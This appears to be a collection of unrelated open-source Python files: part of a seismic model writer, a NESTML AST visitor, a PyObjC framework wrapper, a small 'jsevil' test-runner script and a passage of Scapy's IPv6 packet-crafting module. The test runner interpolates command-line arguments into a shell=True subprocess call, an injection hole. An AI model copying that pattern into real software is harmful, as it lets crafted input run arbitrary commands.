print('Writing ' + filename + ' ...')
f.write(lines[0][:-2] + ' + ' + filename + '\n')
for line in lines[1:3]:
f.write(line[:-2] + '\n')
for i in range(indrange[0]):
f.write(
'%8.0f %9.2f %9.2f %9.2f %9.1f %9.1f %9.2f %9.2f %9.5f \n' %
(ref_radius[i], ref_density[i], ref_vpv[i], ref_vsv[i], ref_Qk[i],
ref_Qmu[i], ref_vph[i], ref_vsh[i], ref_eta[i]))
for i in range(indrange[0], indrange[-1]):
ind2 = -1 - i + indrange[0]
f.write(
'%8.0f %9.2f %9.2f %9.2f %9.1f %9.1f %9.2f %9.2f %9.5f \n' %
(ref_radius[i], rock_rho[ind2], rock_vp[ind2], rock_vs[ind2], ref_Qk[i],
ref_Qmu[i], rock_vp[ind2], rock_vs[ind2], ref_eta[i]))
for i in range(indrange[-1], len(ref_radius)):
f.write(
'%8.0f %9.2f %9.2f %9.2f %9.1f %9.1f %9.2f %9.2f %9.5f \n' %
(ref_radius[i], ref_density[i], ref_vpv[i], ref_vsv[i], ref_Qk[i],
ref_Qmu[i], ref_vph[i], ref_vsh[i], ref_eta[i]))
f.close()
if plotting:
# plot vp
plt.plot(ref_depth / 1.e3, ref_vph / 1.e3, color='g', linestyle='-', label='vp')
plt.plot(depthrange / 1.e3, rock_vp / 1.e3, color='g', linestyle='-',
marker='o', markerfacecolor='g', markersize=1)
# plot Vs
plt.plot(ref_depth / 1.e3, ref_vsh / 1.e3, color='b', linestyle='-', label='vs')
plt.plot(depthrange / 1.e3, rock_vs / 1.e3, color='b', linestyle='-',
marker='o', markerfacecolor='b', markersize=1)
# plot density
plt.plot(ref_depth / 1.e3, ref_density / 1.e3, color='r', linestyle='-', label='density')
plt.plot(depthrange / 1.e3, rock_rho / 1.e3, color='r', linestyle='-',
marker='o', markerfacecolor='r', markersize=1)
plt.title(filename + ' = ' + mineos_ref + ' replaced between ' +
str(min_depth / 1.e3) + ' and ' + str(max_depth / 1.e3) + ' km')
plt.legend(loc='lower right')
plt.show()
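# --- Usage sketch (illustrative; the mineral choice and Composite call are
# assumptions about the surrounding burnman API) ---
#   import burnman
#   from burnman import minerals
#   rock = burnman.Composite([minerals.SLB_2011.mg_perovskite(),
#                             minerals.SLB_2011.periclase()],
#                            [0.8, 0.2])
#   write_axisem_input(rock, filename='axisem_test.txt', plotting=True)
#   write_mineos_input(rock, filename='mineos_test.txt')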
|
ian-r-rose/burnman
|
burnman/output_seismo.py
|
Python
|
gpl-2.0
| 11,627
|
#
# ast_parent_aware_visitor.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
from pynestml.utils.stack import Stack
from pynestml.visitors.ast_visitor import ASTVisitor
class ASTParentAwareVisitor(ASTVisitor):
"""
The parent aware visitor storing a trace. This visitor enables a given visitor to inspect the corresponding
parent node.
Attributes:
parents type(Stack): A stack containing the predecessor of this node.
"""
def __init__(self):
super(ASTParentAwareVisitor, self).__init__()
self.parents = Stack()
def handle(self, _node):
self.visit(_node)
self.parents.push(_node)
self.traverse(_node)
self.parents.pop()
self.endvisit(_node)
return
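# --- Illustrative subclass (not part of NESTML; the Stack method names
# used below are assumptions) ---
# class ParentLoggingVisitor(ASTParentAwareVisitor):
#     def visit(self, node):
#         # self.parents holds the chain of ancestors; its top element,
#         # if any, is the direct parent of the node being visited.
#         parent = self.parents.top() if not self.parents.is_empty() else None
#         print(node, 'has parent', parent)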
|
kperun/nestml
|
pynestml/visitors/ast_parent_aware_visitor.py
|
Python
|
gpl-2.0
| 1,391
|
'''
Python mapping for the Accounts framework.
This module does not contain docstrings for the wrapped code, check Apple's
documentation for details on how to use these functions and classes.
'''
import objc
import sys
import Foundation
from Accounts import _metadata
sys.modules['Accounts'] = mod = objc.ObjCLazyModule(
"Accounts",
"com.apple.Accounts",
objc.pathForFramework("/System/Library/Frameworks/Accounts.framework"),
_metadata.__dict__, None, {
'__doc__': __doc__,
'objc': objc,
'__path__': __path__,
}, (Foundation,))
|
rishabhmalhotra/FireSync
|
PyObjC/Accounts/__init__.py
|
Python
|
gpl-2.0
| 577
|
# Just pretend this is bash... of evil! Muhahahaha!
import subprocess, os, sys
sauronHome = "jsevil"
args = []
# Get special Ogres
def getSpecialOgres():
specialOgres = []
for specialOgre in sys.argv:
args.append(specialOgre)
specialOgreHome = "jsevil/%s" % (specialOgre)
if (os.path.isdir(specialOgreHome)):
specialOgres.append(specialOgre)
else:
specialOgres.append("Ogre doesn't want to dance")
if (len(specialOgres) < 2):
specialOgres.append("Make them all dance")
return specialOgres
# Summon all ogres
def summonAllOgres():
ogres = []
for ogre in os.listdir(sauronHome):
ogres.append(ogre)
return ogres
# Make ogre dance
def ogreDance(ogreName):
result = "jsevil/%s/etc/diff/result.txt" % (ogreName)
command = "node jsevil/%s/bin/integration.js >" % (ogreName)
command += result;
enchant = command;
enchant += " && printf '\x1b[3m'"
enchant += " && echo '%s->expects:'" % (ogreName)
enchant += " && printf '\x1b[0m'"
enchant += " && cat %s | sed -n 's/^./\t&/p'" % (result)
enchant += " && echo '========================================'"
return enchant
# Make ogres dance
def makeOgresDance(ogres, firstOgre):
for ogre in range(firstOgre, len(ogres)):
if (ogres[ogre] != "Ogre doesn't want to dance"):
command = ogreDance(ogres[ogre])
else:
command = "echo 'bad name: %s'" % (args[ogre])
subprocess.call(command, shell=True)
# Make decision
specialOgres = getSpecialOgres()
if (specialOgres[1] == "Make them all dance"):
ogres = summonAllOgres()
makeOgresDance(ogres, 0)
else:
makeOgresDance(specialOgres, 1)
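# --- Usage sketch (illustrative) ---
#   python showUnset.py            # run every suite found under jsevil/
#   python showUnset.py ogreA      # run only jsevil/ogreA (argv[0] is the
#                                  # script itself and never matches a dir)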
|
grebnafets/jsevil
|
tools/python/integration/showUnset.py
|
Python
|
gpl-2.0
| 1,578
|
#! /usr/bin/env python
#############################################################################
## ##
## inet6.py --- IPv6 support for Scapy ##
## see http://natisbad.org/IPv6/ ##
## for more informations ##
## ##
## Copyright (C) 2005 Guillaume Valadon <guedou@hongo.wide.ad.jp> ##
## Arnaud Ebalard <arnaud.ebalard@eads.net> ##
## ##
## This program is free software; you can redistribute it and/or modify it ##
## under the terms of the GNU General Public License version 2 as ##
## published by the Free Software Foundation. ##
## ##
## This program is distributed in the hope that it will be useful, but ##
## WITHOUT ANY WARRANTY; without even the implied warranty of ##
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ##
## General Public License for more details. ##
## ##
#############################################################################
"""
IPv6 (Internet Protocol v6).
"""
import socket
if not socket.has_ipv6:
raise socket.error("can't use AF_INET6, IPv6 is disabled")
if not hasattr(socket, "IPPROTO_IPV6"):
# Workaround for http://bugs.python.org/issue6926
socket.IPPROTO_IPV6 = 41
if not hasattr(socket, "IPPROTO_IPIP"):
# Workaround for https://bitbucket.org/secdev/scapy/issue/5119
socket.IPPROTO_IPIP = 4
from scapy.config import conf
from scapy.layers.l2 import *
from scapy.layers.inet import *
from scapy.fields import *
from scapy.packet import *
from scapy.volatile import *
from scapy.sendrecv import sr,sr1,srp1
from scapy.as_resolvers import AS_resolver_riswhois
from scapy.supersocket import SuperSocket,L3RawSocket
from scapy.arch import *
from scapy.utils6 import *
#############################################################################
# Helpers ##
#############################################################################
def get_cls(name, fallback_cls):
return globals().get(name, fallback_cls)
##########################
## Neighbor cache stuff ##
##########################
conf.netcache.new_cache("in6_neighbor", 120)
def neighsol(addr, src, iface, timeout=1, chainCC=0):
"""
Sends an ICMPv6 Neighbor Solicitation message to get the MAC address
    of the neighbor with the specified IPv6 address 'addr'. The 'src'
    address is used as the source of the message, which is sent on 'iface'.
    By default, the timeout waiting for an answer is 1 second.
    If no answer is gathered, None is returned. Otherwise, the answer
    (an Ethernet frame) is returned.
"""
nsma = in6_getnsma(inet_pton(socket.AF_INET6, addr))
d = inet_ntop(socket.AF_INET6, nsma)
dm = in6_getnsmac(nsma)
p = Ether(dst=dm)/IPv6(dst=d, src=src, hlim=255)
p /= ICMPv6ND_NS(tgt=addr)
p /= ICMPv6NDOptSrcLLAddr(lladdr=get_if_hwaddr(iface))
    res = srp1(p, type=ETH_P_IPV6, iface=iface, timeout=timeout, verbose=0,
               chainCC=chainCC)
return res
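# A minimal usage sketch (hypothetical addresses and interface name; calling
# it sends a real Neighbor Solicitation frame on the wire):
def _neighsol_sketch():
    ans = neighsol("fe80::1", "fe80::2", "eth0", timeout=2)
    if ans is not None and ICMPv6NDOptDstLLAddr in ans:
        return ans[ICMPv6NDOptDstLLAddr].lladdr   # MAC from the answering NA
    return None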
def getmacbyip6(ip6, chainCC=0):
"""
    Returns the MAC address to be used for the provided 'ip6' peer. The
    neighborCache.get() method is used on the instantiated neighbor cache.
    The resolution mechanism is described in the associated docstring.
    (The chainCC parameter value ends up being passed to the sending
    function used to perform the resolution, if needed.)
"""
if in6_ismaddr(ip6): # Multicast
mac = in6_getnsmac(inet_pton(socket.AF_INET6, ip6))
return mac
iff,a,nh = conf.route6.route(ip6, dev=conf.iface6)
if iff == LOOPBACK_NAME:
return "ff:ff:ff:ff:ff:ff"
if nh != '::':
ip6 = nh # Found next hop
mac = conf.netcache.in6_neighbor.get(ip6)
if mac:
return mac
res = neighsol(ip6, a, iff, chainCC=chainCC)
if res is not None:
if ICMPv6NDOptDstLLAddr in res:
mac = res[ICMPv6NDOptDstLLAddr].lladdr
else:
mac = res.src
conf.netcache.in6_neighbor[ip6] = mac
return mac
return None
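# A minimal sketch of the resolution paths described above (hypothetical
# peer addresses; the unicast case may emit a Neighbor Solicitation):
def _getmacbyip6_sketch():
    mcast_mac = getmacbyip6("ff02::1")   # derived directly from the address
    ucast_mac = getmacbyip6("fe80::1")   # cache lookup, then NS if needed
    return mcast_mac, ucast_mac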
#############################################################################
#############################################################################
### IPv6 addresses manipulation routines ###
#############################################################################
#############################################################################
class Net6(Gen): # syntax ex. fec0::/126
"""Generate a list of IPv6s from a network address or a name"""
name = "ipv6"
ipaddress = re.compile(r"^([a-fA-F0-9:]+)(/[1]?[0-3]?[0-9])?$")
def __init__(self, net):
self.repr = net
tmp = net.split('/')+["128"]
if not self.ipaddress.match(net):
tmp[0]=socket.getaddrinfo(tmp[0], None, socket.AF_INET6)[0][-1][0]
netmask = int(tmp[1])
self.net = inet_pton(socket.AF_INET6, tmp[0])
self.mask = in6_cidr2mask(netmask)
self.plen = netmask
def __iter__(self):
def m8(i):
if i % 8 == 0:
return i
tuple = filter(lambda x: m8(x), xrange(8, 129))
a = in6_and(self.net, self.mask)
tmp = map(lambda x: x, struct.unpack('16B', a))
def parse_digit(a, netmask):
netmask = min(8,max(netmask,0))
a = (int(a) & (0xffL<<netmask),(int(a) | (0xffL>>(8-netmask)))+1)
return a
self.parsed = map(lambda x,y: parse_digit(x,y), tmp, map(lambda x,nm=self.plen: x-nm, tuple))
def rec(n, l):
if n and n % 2 == 0:
sep = ':'
else:
sep = ''
if n == 16:
return l
else:
ll = []
for i in xrange(*self.parsed[n]):
for y in l:
ll += [y+sep+'%.2x'%i]
return rec(n+1, ll)
return iter(rec(0, ['']))
def __repr__(self):
return "Net6(%r)" % self.repr
#############################################################################
#############################################################################
### IPv6 Class ###
#############################################################################
#############################################################################
class IP6Field(Field):
def __init__(self, name, default):
Field.__init__(self, name, default, "16s")
def h2i(self, pkt, x):
if type(x) is str:
try:
x = in6_ptop(x)
except socket.error:
x = Net6(x)
elif type(x) is list:
x = map(Net6, x)
return x
def i2m(self, pkt, x):
return inet_pton(socket.AF_INET6, x)
def m2i(self, pkt, x):
return inet_ntop(socket.AF_INET6, x)
def any2i(self, pkt, x):
return self.h2i(pkt,x)
def i2repr(self, pkt, x):
if x is None:
return self.i2h(pkt,x)
elif not isinstance(x, Net6) and not type(x) is list:
if in6_isaddrTeredo(x): # print Teredo info
server, flag, maddr, mport = teredoAddrExtractInfo(x)
return "%s [Teredo srv: %s cli: %s:%s]" % (self.i2h(pkt, x), server, maddr,mport)
elif in6_isaddr6to4(x): # print encapsulated address
vaddr = in6_6to4ExtractAddr(x)
return "%s [6to4 GW: %s]" % (self.i2h(pkt, x), vaddr)
return self.i2h(pkt, x) # No specific information to return
def randval(self):
return RandIP6()
class SourceIP6Field(IP6Field):
__slots__ = ["dstname"]
def __init__(self, name, dstname):
IP6Field.__init__(self, name, None)
self.dstname = dstname
def i2m(self, pkt, x):
if x is None:
dst=getattr(pkt,self.dstname)
iff,x,nh = conf.route6.route(dst)
return IP6Field.i2m(self, pkt, x)
def i2h(self, pkt, x):
if x is None:
dst=getattr(pkt,self.dstname)
if isinstance(dst,Gen):
r = map(conf.route6.route, dst)
r.sort()
if r[0] == r[-1]:
x=r[0][1]
else:
warning("More than one possible route for %s"%repr(dst))
return None
else:
iff,x,nh = conf.route6.route(dst)
return IP6Field.i2h(self, pkt, x)
class DestIP6Field(IP6Field, DestField):
bindings = {}
def __init__(self, name, default):
IP6Field.__init__(self, name, None)
DestField.__init__(self, name, default)
def i2m(self, pkt, x):
if x is None:
x = self.dst_from_pkt(pkt)
return IP6Field.i2m(self, pkt, x)
def i2h(self, pkt, x):
if x is None:
x = self.dst_from_pkt(pkt)
return IP6Field.i2h(self, pkt, x)
ipv6nh = { 0:"Hop-by-Hop Option Header",
4:"IP",
6:"TCP",
17:"UDP",
41:"IPv6",
43:"Routing Header",
44:"Fragment Header",
47:"GRE",
50:"ESP Header",
51:"AH Header",
58:"ICMPv6",
59:"No Next Header",
60:"Destination Option Header",
132:"SCTP",
135:"Mobility Header"}
ipv6nhcls = { 0: "IPv6ExtHdrHopByHop",
4: "IP",
6: "TCP",
17: "UDP",
43: "IPv6ExtHdrRouting",
44: "IPv6ExtHdrFragment",
#50: "IPv6ExtHrESP",
#51: "IPv6ExtHdrAH",
58: "ICMPv6Unknown",
59: "Raw",
60: "IPv6ExtHdrDestOpt" }
class IP6ListField(StrField):
__slots__ = ["count_from", "length_from"]
islist = 1
def __init__(self, name, default, count_from=None, length_from=None):
if default is None:
default = []
StrField.__init__(self, name, default)
self.count_from = count_from
self.length_from = length_from
def i2len(self, pkt, i):
return 16*len(i)
def i2count(self, pkt, i):
if type(i) is list:
return len(i)
return 0
def getfield(self, pkt, s):
c = l = None
if self.length_from is not None:
l = self.length_from(pkt)
elif self.count_from is not None:
c = self.count_from(pkt)
lst = []
ret = ""
remain = s
if l is not None:
remain,ret = s[:l],s[l:]
while remain:
if c is not None:
if c <= 0:
break
c -= 1
addr = inet_ntop(socket.AF_INET6, remain[:16])
lst.append(addr)
remain = remain[16:]
return remain+ret,lst
def i2m(self, pkt, x):
s = ''
for y in x:
try:
y = inet_pton(socket.AF_INET6, y)
except:
y = socket.getaddrinfo(y, None, socket.AF_INET6)[0][-1][0]
y = inet_pton(socket.AF_INET6, y)
s += y
return s
def i2repr(self,pkt,x):
s = []
if x == None:
return "[]"
for y in x:
s.append('%s' % y)
return "[ %s ]" % (", ".join(s))
class _IPv6GuessPayload:
name = "Dummy class that implements guess_payload_class() for IPv6"
def default_payload_class(self,p):
if self.nh == 58: # ICMPv6
t = ord(p[0])
if len(p) > 2 and t == 139 or t == 140: # Node Info Query
return _niquery_guesser(p)
if len(p) >= icmp6typesminhdrlen.get(t, sys.maxint): # Other ICMPv6 messages
return get_cls(icmp6typescls.get(t,"Raw"), "Raw")
return Raw
elif self.nh == 135 and len(p) > 3: # Mobile IPv6
return _mip6_mhtype2cls.get(ord(p[2]), MIP6MH_Generic)
else:
return get_cls(ipv6nhcls.get(self.nh,"Raw"), "Raw")
class IPv6(_IPv6GuessPayload, Packet, IPTools):
name = "IPv6"
fields_desc = [ BitField("version" , 6 , 4),
BitField("tc", 0, 8), #TODO: IPv6, ByteField ?
BitField("fl", 0, 20),
ShortField("plen", None),
ByteEnumField("nh", 59, ipv6nh),
ByteField("hlim", 64),
SourceIP6Field("src", "dst"), # dst is for src @ selection
DestIP6Field("dst", "::1") ]
def route(self):
dst = self.dst
if isinstance(dst,Gen):
dst = iter(dst).next()
return conf.route6.route(dst)
def mysummary(self):
return "%s > %s (%i)" % (self.src,self.dst, self.nh)
def post_build(self, p, pay):
p += pay
if self.plen is None:
l = len(p) - 40
p = p[:4]+struct.pack("!H", l)+p[6:]
return p
def extract_padding(self, s):
l = self.plen
return s[:l], s[l:]
def hashret(self):
if self.nh == 58 and isinstance(self.payload, _ICMPv6):
if self.payload.type < 128:
return self.payload.payload.hashret()
elif (self.payload.type in [133,134,135,136,144,145]):
return struct.pack("B", self.nh)+self.payload.hashret()
nh = self.nh
sd = self.dst
ss = self.src
if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting):
# With routing header, the destination is the last
# address of the IPv6 list if segleft > 0
nh = self.payload.nh
try:
sd = self.addresses[-1]
except IndexError:
sd = '::1'
# TODO: big bug with ICMPv6 error messages as the destination of IPerror6
# could be anything from the original list ...
if 1:
sd = inet_pton(socket.AF_INET6, sd)
for a in self.addresses:
a = inet_pton(socket.AF_INET6, a)
sd = strxor(sd, a)
sd = inet_ntop(socket.AF_INET6, sd)
if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment):
nh = self.payload.nh
if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop):
nh = self.payload.nh
if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):
foundhao = None
for o in self.payload.options:
if isinstance(o, HAO):
foundhao = o
if foundhao:
nh = self.payload.nh # XXX what if another extension follows ?
ss = foundhao.hoa
if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd):
sd = inet_pton(socket.AF_INET6, sd)
ss = inet_pton(socket.AF_INET6, self.src)
return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret()
else:
return struct.pack("B", nh)+self.payload.hashret()
def answers(self, other):
if not isinstance(other, IPv6): # self is reply, other is request
return False
if conf.checkIPaddr:
ss = inet_pton(socket.AF_INET6, self.src)
sd = inet_pton(socket.AF_INET6, self.dst)
os = inet_pton(socket.AF_INET6, other.src)
od = inet_pton(socket.AF_INET6, other.dst)
# request was sent to a multicast address (other.dst)
# Check reply destination addr matches request source addr (i.e
# sd == os) except when reply is multicasted too
# XXX test mcast scope matching ?
if in6_ismaddr(other.dst):
if in6_ismaddr(self.dst):
if ((od == sd) or
(in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))):
return self.payload.answers(other.payload)
return False
if (os == sd):
return self.payload.answers(other.payload)
return False
elif (sd != os): # or ss != od): <- removed for ICMP errors
return False
if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128:
# ICMPv6 Error message -> generated by IPv6 packet
# Note : at the moment, we jump the ICMPv6 specific class
# to call answers() method of erroneous packet (over
# initial packet). There can be cases where an ICMPv6 error
            # class could implement a specific answers method that performs
# a specific task. Currently, don't see any use ...
return self.payload.payload.answers(other)
elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop):
return self.payload.answers(other.payload.payload)
elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment):
return self.payload.answers(other.payload.payload)
elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting):
return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting
elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt):
return self.payload.payload.answers(other.payload.payload)
elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): # BU in reply to BRR, for instance
return self.payload.payload.answers(other.payload)
else:
if (self.nh != other.nh):
return False
return self.payload.answers(other.payload)
conf.neighbor.register_l3(Ether, IPv6, lambda l2,l3: getmacbyip6(l3.dst))
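# A minimal sketch of post_build filling in plen: an 8-byte Echo Request
# header plus 2 data bytes gives a payload length of 10.
def _plen_sketch():
    p = IPv6()/ICMPv6EchoRequest(data="AB")
    return IPv6(str(p)).plen   # -> 10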
class IPerror6(IPv6):
name = "IPv6 in ICMPv6"
def answers(self, other):
if not isinstance(other, IPv6):
return False
sd = inet_pton(socket.AF_INET6, self.dst)
ss = inet_pton(socket.AF_INET6, self.src)
od = inet_pton(socket.AF_INET6, other.dst)
os = inet_pton(socket.AF_INET6, other.src)
# Make sure that the ICMPv6 error is related to the packet scapy sent
if isinstance(self.underlayer, _ICMPv6) and self.underlayer.type < 128:
# find upper layer for self (possible citation)
selfup = self.payload
while selfup is not None and isinstance(selfup, _IPv6ExtHdr):
selfup = selfup.payload
# find upper layer for other (initial packet). Also look for RH
otherup = other.payload
request_has_rh = False
while otherup is not None and isinstance(otherup, _IPv6ExtHdr):
if isinstance(otherup, IPv6ExtHdrRouting):
request_has_rh = True
otherup = otherup.payload
if ((ss == os and sd == od) or # <- Basic case
(ss == os and request_has_rh)): # <- Request has a RH :
# don't check dst address
# Let's deal with possible MSS Clamping
if (isinstance(selfup, TCP) and
isinstance(otherup, TCP) and
selfup.options != otherup.options): # seems clamped
# Save fields modified by MSS clamping
old_otherup_opts = otherup.options
old_otherup_cksum = otherup.chksum
old_otherup_dataofs = otherup.dataofs
old_selfup_opts = selfup.options
old_selfup_cksum = selfup.chksum
old_selfup_dataofs = selfup.dataofs
# Nullify them
otherup.options = []
otherup.chksum = 0
otherup.dataofs = 0
selfup.options = []
selfup.chksum = 0
selfup.dataofs = 0
# Test it and save result
s1 = str(selfup)
s2 = str(otherup)
l = min(len(s1), len(s2))
res = s1[:l] == s2[:l]
# recall saved values
otherup.options = old_otherup_opts
otherup.chksum = old_otherup_cksum
otherup.dataofs = old_otherup_dataofs
selfup.options = old_selfup_opts
selfup.chksum = old_selfup_cksum
selfup.dataofs = old_selfup_dataofs
return res
s1 = str(selfup)
s2 = str(otherup)
l = min(len(s1), len(s2))
return s1[:l] == s2[:l]
return False
def mysummary(self):
return Packet.mysummary(self)
#############################################################################
#############################################################################
### Upper Layer Checksum computation ###
#############################################################################
#############################################################################
class PseudoIPv6(Packet): # IPv6 Pseudo-header for checksum computation
name = "Pseudo IPv6 Header"
fields_desc = [ IP6Field("src", "::"),
IP6Field("dst", "::"),
ShortField("uplen", None),
BitField("zero", 0, 24),
ByteField("nh", 0) ]
def in6_chksum(nh, u, p):
"""
    Performs IPv6 upper-layer checksum computation. Provided parameters are:
    - 'nh' : value of the upper-layer protocol
    - 'u'  : upper-layer instance (TCP, UDP, ICMPv6*, ...). The instance must
             be provided with all its underlayers (IPv6 and all extension
             headers, for example)
    - 'p'  : the payload of the upper layer, provided as a string
    The function operates by filling a pseudo-header class instance
    (PseudoIPv6) with:
    - the Next Header value
    - the address of the _final_ destination (if a Routing Header with a
      non-null segleft field is present in the underlayer classes, the last
      address is used)
    - the address of the _real_ source (basically the source address of the
      IPv6 class instance available in the underlayer, or the address in the
      HAO option if a Destination Options header found in the underlayer
      includes this option)
    - the length of the provided payload string ('p')
"""
ph6 = PseudoIPv6()
ph6.nh = nh
rthdr = 0
hahdr = 0
final_dest_addr_found = 0
while u != None and not isinstance(u, IPv6):
if (isinstance(u, IPv6ExtHdrRouting) and
u.segleft != 0 and len(u.addresses) != 0 and
final_dest_addr_found == 0):
rthdr = u.addresses[-1]
final_dest_addr_found = 1
elif (isinstance(u, IPv6ExtHdrDestOpt) and (len(u.options) == 1) and
isinstance(u.options[0], HAO)):
hahdr = u.options[0].hoa
u = u.underlayer
if u is None:
warning("No IPv6 underlayer to compute checksum. Leaving null.")
return 0
if hahdr:
ph6.src = hahdr
else:
ph6.src = u.src
if rthdr:
ph6.dst = rthdr
else:
ph6.dst = u.dst
ph6.uplen = len(p)
ph6s = str(ph6)
return checksum(ph6s+p)
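# A minimal sketch of a manual upper-layer checksum computation (hypothetical
# link-local addresses; 17 is the UDP protocol number). The UDP instance is
# given its IPv6 underlayer so the pseudo header can be filled in.
def _in6_chksum_sketch():
    p = IPv6(src="fe80::1", dst="fe80::2")/UDP(sport=1024, dport=53)
    return in6_chksum(17, p[UDP], str(p[UDP]))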
#############################################################################
#############################################################################
### Extension Headers ###
#############################################################################
#############################################################################
# Inherited by all extension header classes
class _IPv6ExtHdr(_IPv6GuessPayload, Packet):
    name = 'Abstract IPv6 Option Header'
aliastypes = [IPv6, IPerror6] # TODO ...
#################### IPv6 options for Extension Headers #####################
_hbhopts = { 0x00: "Pad1",
0x01: "PadN",
0x04: "Tunnel Encapsulation Limit",
0x05: "Router Alert",
0x06: "Quick-Start",
0xc2: "Jumbo Payload",
0xc9: "Home Address Option" }
class _OTypeField(ByteEnumField):
"""
    Modified ByteEnumField that displays information regarding the IPv6
    option based on its option type value (what should be done by nodes
    that process the option if they do not understand it ...).
    It is used by the Jumbo, Pad1, PadN, RouterAlert and HAO options.
"""
pol = {0x00: "00: skip",
0x40: "01: discard",
0x80: "10: discard+ICMP",
0xC0: "11: discard+ICMP not mcast"}
enroutechange = {0x00: "0: Don't change en-route",
0x20: "1: May change en-route" }
def i2repr(self, pkt, x):
s = self.i2s.get(x, repr(x))
polstr = self.pol[(x & 0xC0)]
enroutechangestr = self.enroutechange[(x & 0x20)]
return "%s [%s, %s]" % (s, polstr, enroutechangestr)
class HBHOptUnknown(Packet): # IPv6 Hop-By-Hop Option
name = "Scapy6 Unknown Option"
fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
FieldLenField("optlen", None, length_of="optdata", fmt="B"),
StrLenField("optdata", "",
length_from = lambda pkt: pkt.optlen) ]
def alignment_delta(self, curpos): # By default, no alignment requirement
"""
        As specified in section 4.2 of RFC 2460, every option has an
        alignment requirement, usually expressed as xn+y, meaning the
        Option Type must appear at an integer multiple of x octets from
        the start of the header, plus y octets.
        This function is given the current position from the start of
        the header and returns the required padding length.
"""
return 0
class Pad1(Packet): # IPv6 Hop-By-Hop Option
name = "Pad1"
fields_desc = [ _OTypeField("otype", 0x00, _hbhopts) ]
def alignment_delta(self, curpos): # No alignment requirement
return 0
class PadN(Packet): # IPv6 Hop-By-Hop Option
name = "PadN"
fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
FieldLenField("optlen", None, length_of="optdata", fmt="B"),
StrLenField("optdata", "",
length_from = lambda pkt: pkt.optlen)]
def alignment_delta(self, curpos): # No alignment requirement
return 0
class RouterAlert(Packet): # RFC 2711 - IPv6 Hop-By-Hop Option
name = "Router Alert"
fields_desc = [_OTypeField("otype", 0x05, _hbhopts),
ByteField("optlen", 2),
ShortEnumField("value", None,
{ 0: "Datagram contains a MLD message",
1: "Datagram contains RSVP message",
2: "Datagram contains an Active Network message",
68: "NSIS NATFW NSLP",
69: "MPLS OAM",
65535: "Reserved" })]
# TODO : Check IANA has not defined new values for value field of RouterAlertOption
# TODO : Now that we have that option, we should do something in MLD class that need it
# TODO : IANA has defined ranges of values which can't be easily represented here.
# iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml
def alignment_delta(self, curpos): # alignment requirement : 2n+0
x = 2 ; y = 0
delta = x*((curpos - y + x - 1)/x) + y - curpos
return delta
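# A worked example of the xn+y rule: Router Alert is 2n+0, so an option
# starting at offset 3 from the header start needs one pad byte, while
# offset 4 needs none.
def _alignment_sketch():
    ra = RouterAlert()
    return ra.alignment_delta(3), ra.alignment_delta(4)   # -> (1, 0)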
class Jumbo(Packet): # IPv6 Hop-By-Hop Option
name = "Jumbo Payload"
fields_desc = [_OTypeField("otype", 0xC2, _hbhopts),
ByteField("optlen", 4),
IntField("jumboplen", None) ]
def alignment_delta(self, curpos): # alignment requirement : 4n+2
x = 4 ; y = 2
delta = x*((curpos - y + x - 1)/x) + y - curpos
return delta
class HAO(Packet): # IPv6 Destination Options Header Option
name = "Home Address Option"
fields_desc = [_OTypeField("otype", 0xC9, _hbhopts),
ByteField("optlen", 16),
IP6Field("hoa", "::") ]
def alignment_delta(self, curpos): # alignment requirement : 8n+6
x = 8 ; y = 6
delta = x*((curpos - y + x - 1)/x) + y - curpos
return delta
_hbhoptcls = { 0x00: Pad1,
0x01: PadN,
0x05: RouterAlert,
0xC2: Jumbo,
0xC9: HAO }
######################## Hop-by-Hop Extension Header ########################
class _HopByHopOptionsField(PacketListField):
__slots__ = ["curpos"]
def __init__(self, name, default, cls, curpos, count_from=None, length_from=None):
self.curpos = curpos
PacketListField.__init__(self, name, default, cls, count_from=count_from, length_from=length_from)
def i2len(self, pkt, i):
l = len(self.i2m(pkt, i))
return l
def i2count(self, pkt, i):
if type(i) is list:
return len(i)
return 0
def getfield(self, pkt, s):
c = l = None
if self.length_from is not None:
l = self.length_from(pkt)
elif self.count_from is not None:
c = self.count_from(pkt)
opt = []
ret = ""
x = s
if l is not None:
x,ret = s[:l],s[l:]
while x:
if c is not None:
if c <= 0:
break
c -= 1
o = ord(x[0]) # Option type
cls = self.cls
if _hbhoptcls.has_key(o):
cls = _hbhoptcls[o]
try:
op = cls(x)
except:
op = self.cls(x)
opt.append(op)
if isinstance(op.payload, conf.raw_layer):
x = op.payload.load
del(op.payload)
else:
x = ""
return x+ret,opt
def i2m(self, pkt, x):
autopad = None
try:
autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field
except:
autopad = 1
if not autopad:
return "".join(map(str, x))
curpos = self.curpos
s = ""
for p in x:
d = p.alignment_delta(curpos)
curpos += d
if d == 1:
s += str(Pad1())
elif d != 0:
s += str(PadN(optdata='\x00'*(d-2)))
pstr = str(p)
curpos += len(pstr)
s += pstr
# Let's make the class including our option field
# a multiple of 8 octets long
d = curpos % 8
if d == 0:
return s
d = 8 - d
